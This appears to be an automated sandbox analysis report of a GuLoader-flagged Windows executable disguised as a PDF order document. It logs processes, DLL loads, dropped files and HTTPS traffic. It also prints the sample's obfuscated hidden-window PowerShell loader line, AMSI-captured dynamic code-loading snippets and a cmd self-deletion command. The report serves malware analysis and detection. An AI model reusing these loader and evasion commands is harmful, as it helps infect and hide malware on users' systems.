Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59968
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59959
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59964
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59966
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59961
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59972
Source: unknown	Network traffic detected: HTTP traffic on port 59959 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59974
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59962
Source: unknown	Network traffic detected: HTTP traffic on port 59962 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59961 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59970
Source: unknown	Network traffic detected: HTTP traffic on port 59964 -> 443

Source: unknown

HTTPS traffic detected: 108.167.181.251:443 -> 192.168.2.5:59959 version: TLS 1.2

Source: C:\Users\user\Desktop\LPO-9180155-PDF.exe

Code function: 0_2_004052D1 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_004052D1

System Summary

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe

Jump to dropped file

Source: C:\Users\user\Desktop\LPO-9180155-PDF.exe	Code function: 0_2_00403358 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,		0_2_00403358
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Code function: 6_2_00403358 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,		6_2_00403358

Source: C:\Users\user\Desktop\LPO-9180155-PDF.exe	Code function: 0_2_00404B0E	0_2_00404B0E
Source: C:\Users\user\Desktop\LPO-9180155-PDF.exe	Code function: 0_2_0040653D	0_2_0040653D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_02FBEAD8	2_2_02FBEAD8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_02FBF3A8	2_2_02FBF3A8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_02FBE790	2_2_02FBE790
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_0754C17E	2_2_0754C17E
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Code function: 6_2_00404B0E	6_2_00404B0E
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Code function: 6_2_0040653D	6_2_0040653D
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Code function: 6_2_00156108	6_2_00156108
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Code function: 6_2_0015C190	6_2_0015C190
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Code function: 6_2_0015B328	6_2_0015B328
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Code function: 6_2_0015C470	6_2_0015C470
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Code function: 6_2_00156730	6_2_00156730
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Code function: 6_2_0015C752	6_2_0015C752
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Code function: 6_2_00159858	6_2_00159858
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Code function: 6_2_0015CA32	6_2_0015CA32
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Code function: 6_2_00154AD9	6_2_00154AD9
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Code function: 6_2_0015BBD2	6_2_0015BBD2
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Code function: 6_2_0015BEB0	6_2_0015BEB0
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Code function: 6_2_0015B4F2	6_2_0015B4F2
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Code function: 6_2_00153572	6_2_00153572

Source: LPO-9180155-PDF.exe

Static PE information: invalid certificate

Source: LPO-9180155-PDF.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.evad.winEXE@11/12@3/3

Source: C:\Users\user\Desktop\LPO-9180155-PDF.exe

Code function: 0_2_004045C8 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_004045C8

Source: C:\Users\user\Desktop\LPO-9180155-PDF.exe

Code function: 0_2_0040206A CoCreateInstance,

0_2_0040206A

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5360:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1720:120:WilError_03

Source: C:\Users\user\Desktop\LPO-9180155-PDF.exe

File created: C:\Users\user\AppData\Local\Temp\nsv301B.tmp

Jump to behavior

Source: LPO-9180155-PDF.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process

Source: C:\Users\user\Desktop\LPO-9180155-PDF.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\LPO-9180155-PDF.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: LPO-9180155-PDF.exe

ReversingLabs: Detection: 34%

Source: C:\Users\user\Desktop\LPO-9180155-PDF.exe

File read: C:\Users\user\Desktop\LPO-9180155-PDF.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\LPO-9180155-PDF.exe "C:\Users\user\Desktop\LPO-9180155-PDF.exe"
Source: C:\Users\user\Desktop\LPO-9180155-PDF.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Fingereringerne=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Fernland.Reg';$Attributnavn=$Fingereringerne.SubString(75282,3);.$Attributnavn($Fingereringerne) "
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe "C:\Users\user\AppData\Local\Temp\Forbundsstater.exe"
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\Forbundsstater.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3
Source: C:\Users\user\Desktop\LPO-9180155-PDF.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Fingereringerne=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Fernland.Reg';$Attributnavn=$Fingereringerne.SubString(75282,3);.$Attributnavn($Fingereringerne) "	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe "C:\Users\user\AppData\Local\Temp\Forbundsstater.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\Forbundsstater.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3	Jump to behavior

Source: C:\Users\user\Desktop\LPO-9180155-PDF.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\LPO-9180155-PDF.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\LPO-9180155-PDF.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\LPO-9180155-PDF.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\LPO-9180155-PDF.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\LPO-9180155-PDF.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\LPO-9180155-PDF.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\LPO-9180155-PDF.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\LPO-9180155-PDF.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\LPO-9180155-PDF.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\LPO-9180155-PDF.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\LPO-9180155-PDF.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\LPO-9180155-PDF.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\LPO-9180155-PDF.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\LPO-9180155-PDF.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\LPO-9180155-PDF.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\LPO-9180155-PDF.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\LPO-9180155-PDF.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\LPO-9180155-PDF.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: version.dll	Jump to behavior

Source: C:\Users\user\Desktop\LPO-9180155-PDF.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.2547109082.0000000008429000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb55qr source: powershell.exe, 00000002.00000002.2544370653.000000000734E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: stem.Core.pdb$ source: powershell.exe, 00000002.00000002.2544370653.00000000073E2000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000002.00000002.2547573653.0000000008F0F000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Kashers $Comdg $pones), (Indkoges @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Prenatalist = [AppDomain]::CurrentDomain.GetAssemblies()$global:Provend =
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Ufordrageligheden)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Coloquintida, $false).DefineType($Uglie

Suspicious powershell command line found

Source: C:\Users\user\Desktop\LPO-9180155-PDF.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Fingereringerne=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Fernland.Reg';$Attributnavn=$Fingereringerne.SubString(75282,3);.$Attributnavn($Fingereringerne) "
Source: C:\Users\user\Desktop\LPO-9180155-PDF.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Fingereringerne=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Fernland.Reg';$Attributnavn=$Fingereringerne.SubString(75282,3);.$Attributnavn($Fingereringerne) "			Jump to behavior

Source: C:\Users\user\Desktop\LPO-9180155-PDF.exe

Code function: 0_2_00406252 GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00406252

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_02FB0B5D push edi; retf	2_2_02FB0B62
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_02FB12D8 push esp; retf	2_2_02FB12E1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_02FB9307 pushfd ; iretd	2_2_02FB9476
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_07540757 push cs; iretd	2_2_0754075A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_0754E767 push cs; iretd	2_2_0754E76A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_0754A7ED push cs; iretd	2_2_0754A7EE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_0754E7BF push cs; iretd	2_2_0754E7C2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_075437AE push cs; iretd	2_2_075437B2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_07540677 push cs; iretd	2_2_0754067A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_0754E6C1 push cs; iretd	2_2_0754E6C2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_075406FF push cs; iretd	2_2_07540702
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_0754A6FB push cs; iretd	2_2_0754A6FE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_07548518 push cs; iretd	2_2_07548652
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_0754A518 push cs; iretd	2_2_0754A67A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_075465F8 push cs; iretd	2_2_0754678A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_0754044F push cs; iretd	2_2_07540452
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_07540470 push cs; iretd	2_2_0754062E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_0754946D push cs; iretd	2_2_0754946E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_0754E418 push cs; iretd	2_2_0754E5EA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_0754A419 push cs; iretd	2_2_0754A41A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_0754A4FB push cs; iretd	2_2_0754A4FE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_0754B360 push cs; iretd	2_2_0754B59A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_07540309 push cs; iretd	2_2_0754030A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_075403DF push cs; iretd	2_2_075403E2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_07540391 push cs; iretd	2_2_07540392
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_0754625D push cs; iretd	2_2_0754625E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_07547273 push cs; iretd	2_2_07547276
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_07549210 push cs; iretd	2_2_0754937A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_075472DF push cs; iretd	2_2_075472E2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_0754E2C0 push cs; iretd	2_2_0754E3FE
